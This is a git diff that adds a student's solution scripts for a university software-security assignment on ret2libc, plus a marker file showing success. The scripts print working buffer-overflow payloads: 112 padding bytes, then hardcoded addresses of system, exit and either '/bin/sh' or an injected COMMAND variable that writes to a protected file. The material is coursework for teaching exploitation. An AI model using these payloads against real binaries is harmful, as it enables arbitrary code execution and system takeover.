diff --git a/Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh b/Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh
new file mode 100755
index 0000000..de29aca
--- /dev/null
+++ b/Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh	
@@ -0,0 +1,31 @@
+#!/bin/bash
+
+# sources: https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc
+
+##### Exploit Creation Steps #####
+###################################
+
+# Step 1: Locate the offset of the string '/bin/sh' in libc
+# Command: strings -a -t x /usr/lib32/libc-2.31.so | grep /bin/sh
+# ---> 0x18c363
+
+# Step 2: Determine the base address of libc in the ret2libc environment using gdb
+# Command: info proc map
+# ---> 0xf7dd4000
+
+# Step 3: Find the addresses of 'system' and 'exit' functions using gdb
+# Commands:
+#   p system -> 0xf7e15360
+#   p exit -> 0xf7e07ec0
+###################################
+
+############ Exploit ##############
+# Fill the buffer with 'A's until the stored EIP is reached
+printf "A%.0s" {1..112}
+
+# Overwrite the stored EIP with the address of 'system' function
+# Place the address of 'exit' function as the return address for 'system'
+# Provide the argument for 'system' which is the address of the string '/bin/sh' (calculated as base libc + offset)
+# All addresses are in little-endian format
+printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\x63\x03\xf6\xf7"
+###################################
diff --git a/Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh b/Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh
new file mode 100755
index 0000000..42badf4
--- /dev/null
+++ b/Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh	
@@ -0,0 +1,29 @@
+#!/bin/bash
+
+##### Exploit Creation Steps #####
+###################################
+
+# Step 1: Find the addresses of 'system' and 'exit' functions using gdb
+# Commands:
+#   p system -> 0xf7e15360
+#   p exit -> 0xf7e07ec0
+
+# Step 2: Export an environment variable to inject our command as a string into the ret2libc executable
+# Command: export COMMAND="echo 100 > /home/user/t0p_s3cr3t/owned"
+
+# Step 3: Find the address of the environment variable string in memory using gdb
+# Command: x/s *((char **)environ+16) (17th env. variable)
+# Add 8 to the address to skip the 'COMMAND=' part
+#   -> 0xffffdeda (0xffffdee8 in gdb; different env. vars when executing ./ret2libc directly; found by trial and error)
+###################################
+
+############ Exploit ##############
+# Fill the buffer with 'A's until the stored EIP is reached
+printf "A%.0s" {1..112}
+
+# Overwrite the stored EIP with the address of the 'system' function
+# Place the address of the 'exit' function as the return address for 'system'
+# Provide the argument for 'system', which is the address of the value of the environment variable COMMAND
+# All addresses are in little-endian format
+printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\xda\xde\xff\xff"
+###################################
diff --git a/Assignment 6 - Software Security - Teil 2/ret2libc/t0p_s3cr3t/owned b/Assignment 6 - Software Security - Teil 2/ret2libc/t0p_s3cr3t/owned
new file mode 100644
index 0000000..29d6383
--- /dev/null
+++ b/Assignment 6 - Software Security - Teil 2/ret2libc/t0p_s3cr3t/owned	
@@ -0,0 +1 @@
+100